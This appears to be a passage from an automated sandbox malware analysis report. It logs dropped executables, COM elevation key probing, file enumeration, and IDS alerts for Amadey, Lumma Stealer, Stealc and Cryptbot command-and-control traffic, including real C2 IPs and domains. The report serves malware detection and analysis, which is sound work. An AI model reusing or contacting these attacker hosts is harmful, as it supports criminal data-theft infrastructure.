                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]Joe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exeJoe Sandbox ML: detected
                              Source: file.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0033123B CryptContextAddRef,10_2_0033123B
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_14021217-0
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\graph
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49806 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49814 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49822 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49823 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49831 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49832 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49837 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49843 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49844 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49852 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49858 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49863 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49867 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.209.202:443 -> 192.168.2.4:49875 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49876 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49874 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49882 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.65:443 -> 192.168.2.4:49884 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49885 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49897 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49904 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49908 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49916 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50060 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50068 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50120 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50125 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50128 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50134 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50140 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50141 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50157 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50158 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50162 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50168 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50169 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50174 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50177 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50180 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.89.115:443 -> 192.168.2.4:50185 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50186 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.4:50189 version: TLS 1.2
                              Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp
                              Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
                              Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
                              Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: af155ed129.exe, 00000006.00000000.2441026103.000000000032C000.00000002.00000001.01000000.00000009.sdmp
                              Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeDirectory queried: number of queries: 2002
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_003436A9 FindFirstFileExW,8_2_003436A9
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_0034375A
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_003436A9 FindFirstFileExW,10_2_003436A9
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 10_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_0034375A
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeFile opened: C:\Users\user\AppData\Local
                              Source: chrome.exeMemory has grown: Private usage: 6MB later: 29MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49785 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49802 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:57173 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49806 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49814 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49822 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49824 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49832 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49837 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49858 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49866 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49875 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49865 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49843 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49890 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49907 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49906 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49925 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49945 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49942 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49960 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49974 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49978 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49991 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49997 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50005 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50011 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50016 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50024 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50025 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:61253 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:65072 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50060 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:53998 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50051 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50068 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50078 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50089 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50097 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:60789 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:49839 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50120 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50125 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50134 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50129 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50121 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:50121 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:50121
                              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:50121 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50128 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:50121
                              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:50121 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50139 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50140 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50141 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50153 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50157 -> 104.21.21.99:443
